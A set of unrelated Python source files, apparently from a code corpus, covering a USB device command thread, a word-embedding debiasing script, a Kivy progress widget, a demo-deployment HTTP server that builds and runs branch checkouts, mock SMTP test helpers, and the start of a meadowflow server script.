rv = self._device.read_stream_stop(*args, **kwargs)
elif cmd == '__str__':
rv = str(self._device)
else:
log.warning('unsupported command %s', cmd)
except:
log.exception('While running command')
if not delegate_cbk and callable(cbk):
try:
cbk(rv)
except:
log.exception('in callback')
log.debug('_cmd_process %s - done', cmd)
def _cmd_process_all(self):
_quit = False
try:
while not _quit:
cmd, args, cbk = self._cmd_queue.get(timeout=0.0)
self.counter += 1
self._cmd_process(cmd, args, cbk)
if cmd in ['close']:
log.info('DeviceThread._cmd_process_all close')
_quit = True
except queue.Empty:
pass
except Exception:
log.exception('DeviceThread._cmd_process_all unhandled')
return _quit
def _cmd_flush(self):
while True:
try:
cmd, args, cbk = self._cmd_queue.get(timeout=0.0)
self.counter += 1
if not callable(cbk):
continue
cbk(ConnectionError('device closed'))
except queue.Empty:
break
except Exception:
log.exception('_cmd_flush')
def run(self):
_quit = False
log.info('DeviceThread.run start')
while not _quit:
try:
self._device.process(timeout=0.05)
except Exception:
log.exception('In device thread')
_quit = self._cmd_process_all()
log.info('DeviceThread.run flush')
self._cmd_flush()
log.info('DeviceThread.run done')
def _post(self, command, args, cbk):
# log.debug('DeviceThread %s', command)
if self._thread is None:
log.info('DeviceThread.post(%s) when thread not running', command)
else:
self._cmd_queue.put((command, args, cbk))
self._device.signal()
def _join(self, timeout=None):
timeout = TIMEOUT if timeout is None else timeout
if not self._closing:
self._closing = True
self._post('close', None, None)
if self._thread:
# thread can safely join() multiple times
self._thread.join(timeout=timeout)
self._thread = None
def _post_block(self, command, args, timeout=None):
timeout = TIMEOUT if timeout is None else float(timeout)
log.debug('_post_block %s start', command)
while not self._response_queue.empty():
log.warning('response queue not empty')
try:
self._response_queue.get(timeout=0.0)
except queue.Empty:
pass
self._post(command, args, lambda rv_=None: self._response_queue.put(rv_))
if self._thread is None:
raise IOError('DeviceThread not running')
else:
try:
rv = self._response_queue.get(timeout=timeout)
except queue.Empty as ex:
log.error('device thread hung: %s - FORCE CLOSE', command)
self._join(timeout=TIMEOUT)
rv = ex
except Exception as ex:
rv = ex
if isinstance(rv, Exception):
raise IOError(rv)
log.debug('_post_block %s done', command) # rv
return rv
def __str__(self):
if self._str is not None:
pass
elif self._thread is not None:
self._str = self._post_block('__str__', None)
else:
self._str = str(self._device)
return self._str
@property
def serial_number(self):
if self._device is None:
return None
return self._device.serial_number
def open(self, event_callback_fn=None):
self.close()
log.info('open')
self._thread = threading.Thread(name='usb_device', target=self.run)
self._thread.start()
self._closing = False
try:
return self._post_block('open', event_callback_fn, timeout=TIMEOUT_OPEN)
except:
self.close()
raise
def close(self):
log.info('close')
self._join(timeout=TIMEOUT)
_queue_empty(self._cmd_queue)
_queue_empty(self._response_queue)
_queue_empty(self._signal_queue)
def control_transfer_out(self, *args, **kwargs):
return self._post_block('control_transfer_out', (args, kwargs))
def control_transfer_in(self, *args, **kwargs):
return self._post_block('control_transfer_in', (args, kwargs))
def read_stream_start(self, *args, **kwargs):
return self._post_block('read_stream_start', (args, kwargs))
def read_stream_stop(self, *args, **kwargs):
return self._post_block('read_stream_stop', (args, kwargs))
def status(self):
return self._post_block('status', None)
def signal(self):
self._signal_queue.put(None)
def process(self, timeout=None):
try:
self._signal_queue.get(timeout=timeout)
except queue.Empty:
pass
|
RANDebias.py | import os
import numpy as np
import pickle
import torch.nn.functional as F
import torch.nn as nn
import torch
import we
from tqdm import tqdm
from copy import deepcopy
import copy
import pickle
import time
import argparse
import gc
from multiprocessing import Process
import time
import configparser
import utils
utils.seed_everything() #Reproducibility
def parse_float(s):
"""to read the config file properly"""
try:
return float(s)
except:
n, d = s.split("/")
return float(n)/float(d)
def get_ns_idb(word, N):
"""Quick reference from the pre-computed neighbour dictionary see `../GIPE/make_neighbours.py`"""
return N[word]
def init_vector(word, E):
"""Initializing the vector with original embedding makes converges faster"""
v = deepcopy(E.v(word))
return torch.FloatTensor(v)
def torch_cosine_similarity(X, vectors):
return torch.matmul(vectors, X) / (vectors.norm(dim=1) * X.norm(dim=0))
def ran_objective(X, sel, desel, g, ws):
"""The heart of Repulsion-Attraction-Neutralization"""
w1, w2, w3 = ws
A = torch.abs(torch_cosine_similarity(X, sel) - 1).mean(dim=0)/2
if not isinstance(desel, bool):
R = torch.abs(torch_cosine_similarity(X, desel)).mean(dim=0)
else:
R = 0 #nothing to repel
N = torch.abs(X.dot(g)).mean(dim=0)
J = w1*R + w2*A + w2*N
return J
#CPU
class RANDebias(nn.Module):
def __init__(self, E, word, X, N, g, ws=[0.33, 0.33, 0.33], ripa=False):
super(RANDebias, self).__init__()
sel_max = 1
desel_max = 100
self.sel = N[word]['selected'][:sel_max]
self.desel = N[word]['deselected'][:desel_max]
self.sel = torch.FloatTensor(
[E.v(l) for l in self.sel]).requires_grad_(True)
if len(self.desel) == 0:
self.desel = False
else:
self.desel = torch.FloatTensor(
[E.v(l) for l in self.desel]).requires_grad_(True)
self.X = nn.Parameter(X)
self.E = E
self.g = g
self.word = word
self.ws = ws
def forward(self):
return ran_objective(self.X, self.sel, self.desel,
self.g, self.ws)
def minimize(E, word, X, lr, max_epochs, *args, **kwargs):
m = RANDebias(E, word, X, *args, **kwargs)
optimizer = torch.optim.Adam(m.parameters(), lr=lr)
for epoch in range(max_epochs):
optimizer.zero_grad()
out = m.forward()
out.backward()
optimizer.step()
return m.X
def get_new_word_embs(E, word,*args, **kwargs):
X = init_vector(word, E).requires_grad_(True)
debiased_X = minimize(E, word, X, *args, **kwargs)
return debiased_X/torch.norm(debiased_X)
def get_N_info(words, N, sel_max=1, desel_max=100):
"""there's a sel_max arg because earlier I tried
to attract to more words than the original word itself.
you can try experimenting for `sel_max` > 1, for me
it yields worse results in gender bias tests and almost
no improvement in semantic and analogy tests."""
thresh, N_info = 0.05, {}
for w in words:
sel, desel = [], []
try:
for key in N[w]:
if N[w][key] >= thresh: desel.append(key)
else: sel.append(key)
except:
print(f"Problem for word: {w}")
N_info[w] = dict(zip(['selected', 'deselected'], [sel[:sel_max], desel[:desel_max]]))
return N_info
def get_embedding_and_g(filename):
E = we.WordEmbedding(filename)
g = utils.get_g()
g = torch.Tensor(g)
return E, g
def debias_part(start, end, conf_file, sleep_t):
config = configparser.ConfigParser()
config.read(conf_file)[0]
config = config['RAN-GloVe']
learning_rate = parse_float(config['lr'])
lambda_weights = [parse_float(config['lambda_1']), parse_float(config['lambda_2']), parse_float(config['lambda_3'])]
n_epochs = int(config['n_epochs'])
emb_file = config['emb_file']
out_emb_name = config['out_emb_name']
deb_file = config['deb_file']
ns_file = config['ns_file']
op_directory = config['op_directory']
time.sleep(sleep_t) #memory gets full if I load all processes at once, gc.collect() takes some time to reach so wait.
E, g = get_embedding_and_g(emb_file)
with open(deb_file, 'rb') as handle:
biased_list = pickle.load(handle)
with open(ns_file, 'rb') as handle:
N = pickle.load(handle)
print(f"Loaded N for: {start} to {end}")
wrds_to_debias = biased_list[start:end]
N_info = get_N_info(wrds_to_debias, N)
del N; gc.collect()
new_embs = {}
for word in tqdm(wrds_to_debias):
try:
new_embs[word] = get_new_word_embs(E, word,
learning_rate, n_epochs, N_info, g=g,
ws=lambda_weights).detach().numpy()
except:
print(f"Failed for word: {word}")
out_emb_name = f"{out_emb_name}-{start}-to-{end}.dict.pickle"
fname = os.path.join(op_directory, out_emb_name)
if not os.path.exists(op_directory):
os.makedirs(op_directory)
with open(fname, "wb") as handle:
print(f"Saving... {fname}")
pickle.dump(new_embs, handle)
return True
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--conf_name', default="config.ini", type=str,
help="config file. See `config.ini` for an example.")
parser.add_argument('--deb_list_file', default="../data/debias.pkl", type=str,
help="pickled list of words to debias.")
parser.add_argument('--n', default=4, type=int,
help="number of processes, usually set this equal to the number of physical cores.")
args = parser.parse_args()
conf_file = args.conf_name
deb_list_file = args.deb_list_file
n = args.n
with open(deb_list_file, "rb") as handle:
biased_list = pickle.load(handle)
l = len(biased_list)
width = l // n
arguments = []
sleeps = [30*i for i in range(n)]
for i in range(n):
start = int(i*width)
end = int((i+1)*width)
arguments.append([start, end, conf_file, sleeps[i]])
ps = [Process(target=debias_part, args=arguments[i]) for i in range(n)]
for p in ps:
p.start()
for p in ps:
p.join()
|
process_manager.py | import threading
from kivymd.uix.card import MDSeparator
from kivymd.uix.label import MDLabel
from kivymd.uix.progressbar import MDProgressBar
from kivy.uix.boxlayout import BoxLayout
from tesseractXplore.widgets.process_manager import ProcessManagerItem
from tesseractXplore.app import get_app
def processmanager(processname:str):
""" Displaying active background process to the user"""
pm = ProcessManagerItem()
boxlayout = BoxLayout(orientation="vertical")
main_label = MDLabel(
text="Process running",
theme_text_color= "Custom",
text_color= (1, 1, 1, 1),
size_hint_y= None,
adaptive_height= True,
)
boxlayout.add_widget(main_label)
sep = MDSeparator(height= "1dp", color='cyan')
boxlayout.add_widget(sep)
process_label = MDLabel(text= processname,
theme_text_color= "Custom",
text_color= (1, 1, 1, 1),)
boxlayout.add_widget(process_label)
boxlayout2 = BoxLayout(orientation= "vertical")
pb = MDProgressBar(type= "determinate", running_duration= 1, catching_duration= 1.5)
boxlayout2.add_widget(pb)
pb.start()
boxlayout.add_widget(boxlayout2)
pm.add_widget(boxlayout)
return pm
def create_threadprocess(processname:str,func, *args, **kwargs):
new_thread = threading.Thread(target=func, args=args, kwargs=kwargs)
new_thread.setDaemon(True)
new_thread.start()
pm = processmanager(processname)
get_app().active_threads[new_thread] = pm
get_app().image_selection_controller.screen.process_list.add_widget(pm)
def create_online_threadprocess(processname:str,func, *args, **kwargs):
new_thread = threading.Thread(target=func, args=args, kwargs=kwargs)
new_thread.setDaemon(True)
new_thread.start()
pm = processmanager(processname)
get_app().active_threads[new_thread] = pm
get_app().image_selection_online_controller.screen.process_list.add_widget(pm) |
demo.py | #!/usr/bin/env python
import SimpleHTTPServer
import SocketServer
import atexit
import io
import json
import multiprocessing
import os
import re
import signal
import subprocess
import threading
import urlparse
import sys
PORT = 8000
NUM_WORKER_THREADS = 4
NAME_RE = '[A-Za-z0-9_]+'
LOG_RE = '[A-Za-z0-9_]+.log'
# Demo states.
STARTING = 1
ERROR = 2
STARTED = 3
DOWN = 4
# Demo global table.
demos = {}
def demos_to_json():
ret = {}
for name, demo in demos.items():
d = {}
for k, v in demo.items():
if k == 'backend_reindex':
d[k] = 'Reindexing, please wait...' if v.poll() is None else 'Return code: %d (0 is done and ok)' % v.poll()
elif k == 'backend_update_synonyms':
d[k] = 'Updating synonyms, please wait...' if v.poll() is None else 'Return code: %d (0 is done and ok)' % v.poll()
elif k == 'backend_reindex_grammars':
d[k] = 'Reindexing grammars, please wait...' if v.poll() is None else 'Return code: %d (0 is done and ok)' % v.poll()
elif k == 'backend_process':
d[k] = 'Backend Running' if v.poll() is None else 'Return code: %d (any value means backend is down!)' % v.poll()
elif k == 'frontend_process':
d[k] = 'Frontend Running' if v.poll() is None else 'Return code: %d (any value means frontend is down!)' % v.poll()
#elif k == 'ssr_frontend_process':
# d[k] = 'Frontend Running' if v.poll() is None else 'Return code: %d (any value means frontend is down!)' % v.poll()
else:
d[k] = v
ret[name] = d
return ret
# Ports management handling.
BACKEND_PORTS_START = 9700
backend_ports = {}
FRONTEND_PORTS_START = 4500
frontend_ports = {}
def get_backend_port():
return get_port(backend_ports, BACKEND_PORTS_START)
def get_frontend_port():
return get_port(frontend_ports, FRONTEND_PORTS_START)
def free_backend_port(port):
free_port(backend_ports, port)
def free_frontend_port(port):
free_port(frontend_ports, port)
def get_port(ports, start):
port = start
while port in ports:
port += 1
ports[port] = True
return port
def free_port(ports, port):
if port in ports:
del ports[port]
# Run shell command, return return code, stdout and stderr.
def run_command(command, cwd=None, shell=False):
command_str = command
if type(command) is list:
command_str = ' '.join(command)
print 'running command: [%s]' % command_str
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=cwd, shell=shell)
stdout, stderr = process.communicate()
if shell:
print 'before wait!'
returncode = process.wait()
print 'after wait!'
return (returncode, stdout, stderr)
return (process.returncode, stdout, stderr)
def backend_dir(name):
return '../archive-backend-%s' % name
def frontend_dir(name):
return '../kmedia-mdb-%s' % name
# Start async tasks.
def start_backend(name):
demos[name]['backend_process'] = subprocess.Popen(
'./archive-backend server >& ./server.log',
cwd=backend_dir(name),
shell=True,
preexec_fn=os.setsid)
print 'Started backend_process, pid: %d' % demos[name]['backend_process'].pid
def kill_backend(name):
kill_process(name, 'backend_process')
def start_reindex(name):
demos[name]['backend_reindex'] = subprocess.Popen(
'./archive-backend index --index_date=%s --update_alias=false >& ./index.log' % name,
cwd=backend_dir(name),
shell=True)
print 'Started backend_reindex, pid: %d' % demos[name]['backend_reindex'].pid
demos[name]['backend_reindex'].communicate()
def start_reindex_grammars(name):
demos[name]['backend_reindex_grammars'] = subprocess.Popen(
'./archive-backend index_grammars --index_date=%s --update_alias=false >& ./grammar_index.log' % name,
cwd=backend_dir(name),
shell=True)
print 'Started backend_reindex_grammars, pid: %d' % demos[name]['backend_reindex_grammars'].pid
demos[name]['backend_reindex_grammars'].communicate()
def start_update_synonyms(name):
demos[name]['backend_update_synonyms'] = subprocess.Popen(
'./archive-backend update_synonyms --index_date=%s >& ./update_synonyms.log' % name,
cwd=backend_dir(name),
shell=True)
print 'Started backend_update_synonyms, pid: %d' % demos[name]['backend_update_synonyms'].pid
demos[name]['backend_update_synonyms'].communicate()
def delete_indexes(name):
(returncode, stdout, stderr) = run_command('./archive-backend delete_index --index_date=%s' % name, backend_dir(name), True)
if returncode != 0:
print 'Failed deleting index stderr: %s, stdout: %s returncode: %d' % (stderr, stdout, returncode)
return (returncode, stderr, stdout)
else:
print 'Deleted index %s' % name
(returncode, stdout, stderr) = run_command('./archive-backend delete_grammar_index --index_date=%s' % name, backend_dir(name), True)
if returncode != 0:
print 'Failed deleting grammar index stderr: %s, stdout: %s returncode: %d' % (stderr, stdout, returncode)
return (returncode, stderr, stdout)
else:
print 'Deleted grammar index %s' % name
return (0, "", "")
def start_frontend(name):
demos[name]['frontend_process'] = subprocess.Popen(
'SERVER_PORT=%d NODE_ENV=production node server/index.js >& ./frontend.log' % demos[name]['frontend_port'],
#'CRA_CLIENT_PORT=%d SERVER_PORT=%d yarn start-server >& ./frontend.log' % (demos[name]['ssr_frontend_port'], demos[name]['frontend_port']),
cwd=frontend_dir(name),
shell=True,
preexec_fn=os.setsid)
print 'Started frontend_process, pid: %d' % demos[name]['frontend_process'].pid
#demos[name]['ssr_frontend_process'] = subprocess.Popen(
# 'PORT=%d yarn start-js >& ./ssr_frontend.log' % (demos[name]['ssr_frontend_port']),
# cwd=frontend_dir(name),
# shell=True,
# preexec_fn=os.setsid)
#print 'Started ssr_frontend_process, pid: %d' % demos[name]['ssr_frontend_process'].pid
def kill_process(name, process):
try:
os.killpg(os.getpgid(demos[name][process].pid), signal.SIGTERM)
returncode = demos[name][process].wait()
print 'Killed %s: %d' % (process, returncode)
except OSError as e:
print 'failed stopping %s %d: %s' % (process, demos[name][process].pid, e)
del demos[name][process]
def kill_frontend(name):
kill_process(name, 'frontend_process')
#kill_process(name, 'ssr_frontend_process')
# Cleanup:
# 1) All background processes stopped automatically. Backend, reindex, grammar reindex, frontend.
# 2) Delete Elasitic indexes.
# 3) Delete directories.
# Clean all running subprocesses on exit.
def cleanup():
# Processes are killd automatically as they are sub processes of current (shell=True).
# Delete Elastic indexes.
for name, demo in demos.items():
stop_and_clean(name)
def stop_and_clean(name):
demo = demos[name]
if demo['elastic'] == 'reindex':
delete_indexes(name)
if 'frontend_port' in demo:
kill_frontend(name)
free_frontend_port(demo['frontend_port'])
del demo['frontend_port']
#if 'ssr_frontend_port' in demo:
# free_frontend_port(demo['ssr_frontend_port'])
# del demo['ssr_frontend_port']
if 'backend_port' in demo:
kill_backend(name)
free_backend_port(demo['backend_port'])
del demo['backend_port']
(returncode, stdout, stderr) = run_command(['rm', '-rf', backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['rm', '-rf', frontend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
del demos[name]
print 'stopped and cleaned demo %s' % name
# Register exit cleanup function.
atexit.register(cleanup)
def set_up_frontend(name, branch):
(returncode, stdout, stderr) = run_command(['ls', frontend_dir(name)])
if returncode == 0:
return 'Cannot use [%s], already used. stderr: %s, stdout: %s' % (name, stdout, stderr)
(returncode, stdout, stderr) = run_command(['git', 'clone', 'https://github.com/Bnei-Baruch/kmedia-mdb.git', frontend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['git', 'checkout', branch], cwd=frontend_dir(name))
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['cp', '../kmedia-mdb/.env', '%s/.env.demo' % frontend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
demos[name]['frontend_port'] = get_frontend_port()
#demos[name]['ssr_frontend_port'] = get_frontend_port()
(returncode, stdout, stderr) = run_command([
'sed', '-i', '-E',
's/REACT_APP_BASE_URL=.*/REACT_APP_BASE_URL=http:\/\/bbdev6.kbb1.com:%d\//g' % demos[name]['frontend_port'],
'%s/.env.demo' % frontend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command([
'sed', '-i', '-E',
's/REACT_APP_API_BACKEND=.*/REACT_APP_API_BACKEND=http:\/\/bbdev6.kbb1.com:%d\//g' % demos[name]['backend_port'],
'%s/.env.demo' % frontend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command([
'sed', '-i',
's/\'default-src\': \[/\'default-src\': [ \'bbdev6.kbb1.com:%d\',/g' % demos[name]['backend_port'],
'%s/server/app-prod.js' % frontend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['yarn', 'install'], cwd=frontend_dir(name))
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['REACT_APP_ENV=demo yarn build >& ./build.log'], cwd=frontend_dir(name), shell=True)
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
start_frontend(name)
backend_lock = threading.Lock()
def update_reload(name):
if demos[name]['elastic'] == 'reindex':
with backend_lock:
branch = 'origin/%s' % demos[name]['backend_branch']
(returncode, stdout, stderr) = run_command(['git', 'status'])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
m = re.search(r'# On branch (.*)', stdout)
if not m:
print 'git status:\n%s' % stdout
m = re.search(r'# HEAD detached at (.*)', stdout)
if not m:
return 'Failed extracting git current branch.'
original_branch = m.groups(1)[0]
(returncode, stdout, stderr) = run_command(['git', 'fetch'])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['git', 'checkout', branch])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['cp', '-rf', './data/search', '%s/data/' % backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['cp', '-rf', './data/es', '%s/data/' % backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
kill_backend(name)
start_backend(name)
error = start_update_synonyms(name)
if error:
demos[name]['status'].append(error)
if original_branch != branch:
(returncode, stdout, stderr) = run_command(['git', 'checkout', original_branch])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
demos[name]['status'].append('Updated variables, grammars and synonyms. Reloaded backend.')
def set_up_backend(name):
with backend_lock:
(returncode, stdout, stderr) = run_command(['ls', backend_dir(name)])
if returncode == 0:
return 'Cannot use [%s], already used. stderr: %s, stdout: %s' % (name, stdout, stderr)
(returncode, stdout, stderr) = run_command(['git', 'status'])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
m = re.search(r'# On branch (.*)', stdout)
if not m:
print 'git status:\n%s' % stdout
m = re.search(r'# HEAD detached at (.*)', stdout)
if not m:
return 'Failed extracting git current branch.'
original_branch = m.groups(1)[0]
(returncode, stdout, stderr) = run_command(['git', 'fetch'])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
branch = 'origin/%s' % demos[name]['backend_branch']
if original_branch != branch:
(returncode, stdout, stderr) = run_command(['git', 'checkout', branch])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['make', 'build'])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
else:
demos[name]['status'].append('Backend binary built')
(returncode, stdout, stderr) = run_command(['mkdir', backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['cp', './archive-backend', backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['cp', './config.toml', backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['mkdir', '%s/data' % backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['mkdir', '%s/data/search' % backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['mkdir', '%s/data/es' % backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['mkdir', '%s/search' % backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['cp', './search/eval.html', '%s/search/' % backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
demos[name]['backend_port'] = get_backend_port()
(returncode, stdout, stderr) = run_command([
'sed', '-i', '-E',
's/bind-address=\":[0-9]+\"/bind-address=\":%d\"/g' % demos[name]['backend_port'],
'%s/config.toml' % backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['cp', '-rf', './data/search', '%s/data/' % backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command(['cp', '-rf', './data/es', '%s/data/' % backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
if demos[name]['elastic'] == 'reindex':
(returncode, stdout, stderr) = run_command([
'sed', '-i', '-E',
's/#index-date.*/index-date = \"%s\"/g' % name,
'%s/config.toml' % backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command([
'sed', '-i', '-E',
's/#grammar-index-date.*/grammar-index-date = \"%s\"/g' % name,
'%s/config.toml' % backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
else:
(returncode, stdout, stderr) = run_command([
'sed', '-i', '-E',
's/(.*ELASTIC-LOCAL)/#\\1/g',
'%s/config.toml' % backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
(returncode, stdout, stderr) = run_command([
'sed', '-i', '-E',
's/#(.*ELASTIC-PROD)/\\1/g',
'%s/config.toml' % backend_dir(name)])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
if original_branch != branch:
(returncode, stdout, stderr) = run_command(['git', 'checkout', original_branch])
if returncode != 0:
return 'stderr: %s, stdout: %s' % (stderr, stdout)
start_backend(name)
return ''
def set_up_demo(name):
# Start backend
print 'Setting up demo: %s.' % demos[name]
demos[name]['status'].append('Setting up backend')
error = set_up_backend(name)
if error:
demos[name]['status'].append(error)
return
else:
demos[name]['status'].append('Backend set up.')
# Start frontend
demos[name]['status'].append('Setting up frontend...')
error = set_up_frontend(name, demos[name]['frontend_branch'])
if error:
demos[name]['status'].append(error)
return
# Reindex index, grammars, and update synonyms.
if demos[name]['elastic'] == 'reindex':
demos[name]['status'].append('Cleaning existing indexes for [%s]' % name)
(returncode, stdout, stderr) = delete_indexes(name)
if returncode != 0:
print 'Failed clening existing indexes: %d %s %s' % (returncode, stdout, stderr)
demos[name]['status'].append('Failed clening existing indexes: %d' % returncode)
demos[name]['status'].append('Reindexing ... will take ~20 minutes.')
error = start_reindex_grammars(name)
if error:
demos[name]['status'].append(error)
return
demos[name]['status'].append('Grammars indexed successfully.')
error = start_reindex(name)
if error:
demos[name]['status'].append(error)
return
demos[name]['status'].append('Indexed everything successfully.')
error = start_update_synonyms(name)
if error:
demos[name]['status'].append(error)
return
demos[name]['status'].append('Synonyms updated successfully.')
demos[name]['status'].append('Done!')
start_queue = multiprocessing.JoinableQueue()
def queue_worker():
while True:
name = start_queue.get()
set_up_demo(name)
start_queue.task_done()
for i in range(NUM_WORKER_THREADS):
t = threading.Thread(target=queue_worker)
t.daemon = True
t.start()
# Monitor calls
nextCallId = 0
calls = {}
class MonitorCalls:
def __init__(self, message):
global nextCallId
global calls
self.callId = nextCallId
nextCallId += 1
calls[self.callId] = message
def __enter__(self):
self.printCalls('Before')
return self.callId
def __exit__(self, type, value, traceback):
global calls
del calls[self.callId]
self.printCalls('After')
def printCalls(self, prefix):
global calls
print '\n%s - %d Calls:' % (prefix, len(calls))
for (k, v) in calls.iteritems():
print '%s - %s' % (k, v)
print
sys.stdout.flush()
class DemoHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def return_response(self, code, message):
# print 'returning [%d]: [%s]' % (code, message)
self.send_response(code)
self.end_headers()
self.wfile.write(message)
def do_GET(self):
with MonitorCalls(self.path):
parts = urlparse.urlparse(self.path)
# print 'get %s' % (parts,)
if parts.path == '/':
self.path = './misc/demo.html'
return SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
if parts.path == '/status':
self.return_response(200, json.dumps(demos_to_json()))
return
# Serve log files.
m = re.match(r'^/logs/(%s)/(%s)$' % (NAME_RE, LOG_RE), parts.path)
if m:
filename = m.groups(1)[1]
dirname = backend_dir(m.groups(1)[0])
if filename == 'frontend.log': #or filename == 'ssr_frontend.log':
dirname = frontend_dir(m.groups(1)[0])
path = '%s/%s' % (dirname, filename)
text = 'Unable to read file'
with open(path, 'r') as f:
text = f.read()
self.return_response(200, text)
return
m = re.match(r'^/stop_and_clean/(%s)$' % NAME_RE, parts.path)
if m:
stop_and_clean(m.groups(1)[0])
m = re.match(r'^/update_reload/(%s)$' % NAME_RE, parts.path)
if m:
update_reload(m.groups(1)[0])
# Cannot server config.toml as it has passwords insdie...
# m = re.match(r'^/logs/(%s)/config.toml$' % NAME_RE, parts.path)
# if m:
# path = '%s/config.toml' % backend_dir(m.groups(1)[0])
# logs = 'Unable to read config file'
# with open(path, 'r') as log_file:
# logs = log_file.read()
# self.return_response(200, logs)
# return
def do_POST(self):
with MonitorCalls(self.path):
if self.path == '/start':
content_length = int(self.headers['Content-Length'])
body = self.rfile.read(content_length)
request = json.loads(body)
print request
print type(request)
fields = ['name', 'comment', 'backend_branch', 'frontend_branch', 'elastic']
missing_fields = [f for f in fields if not request[f]]
if len(missing_fields):
self.return_response(400, 'Please set field values: %s.' % ', '.join(missing_fields))
return
if not re.match(r'^%s$' % NAME_RE, request['name']):
self.return_response(400, '"name" should be simple letters, digits or underscore without spaces.')
return
if request['name'] in demos:
self.return_response(400, 'Demo with name: [%s] already exist.' % request['name'])
return
request['status'] = []
demos[request['name']] = request
start_queue.put(request['name'])
self.send_response(200)
class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
SocketServer.TCPServer.allow_reuse_address = True
httpd = ThreadingTCPServer(("", PORT), DemoHandler)
print "serving at port", PORT
httpd.serve_forever()
start_queue.join()
|
mockup.py | import asyncore
import contextlib
import smtpd
import threading
from . import datetimehelpers
from .application import Application
from .messaging import Messenger
@contextlib.contextmanager
def mockup_smtp_server(bind=('localhost', 0)):
SMTP_SERVER_LOCK = threading.Event()
class MockupSMTPServer(smtpd.SMTPServer):
def __init__(self, bind):
super().__init__(bind, None, decode_data=False)
self.server_address = self.socket.getsockname()[:2]
SMTP_SERVER_LOCK.set()
def process_message(*args, **kwargs):
pass
server = MockupSMTPServer(bind)
thread = threading.Thread(target=asyncore.loop, daemon=True)
thread.start()
SMTP_SERVER_LOCK.wait()
yield server, server.server_address
asyncore.close_all()
class MockupMessenger(Messenger):
_last_message = None
@property
def last_message(self):
return self.__class__._last_message
@last_message.setter
def last_message(self, value):
self.__class__._last_message = value
def send(
self,
to, subject, body,
cc=None,
bcc=None,
template_string=None,
template_filename=None,
from_=None,
attachments=None
):
self.last_message = {
'to': to,
'body': body,
'subject': subject
}
@contextlib.contextmanager
def mockup_localtimezone(timezone):
backup = datetimehelpers.localtimezone
datetimehelpers.localtimezone = timezone if callable(timezone) \
else lambda: timezone
yield
datetimehelpers.localtimezone = backup
|
server_main.py | """A runnable script for running a meadowflow server"""
import asyncio
import contextlib
import logging
import multiprocessing
from typing import Iterator, Optional
import meadowflow.server.server
from meadowflow.scheduler import Scheduler
from meadowflow.server.config import DEFAULT_HOST, DEFAULT_PORT
async def start(host: str, port: int, job_runner_poll_delay_seconds: float) -> None:
async with Scheduler(job_runner_poll_delay_seconds) as scheduler:
await meadowflow.server.server.start_meadowflow_server(scheduler, host, port)
def main(
host: str = DEFAULT_HOST,
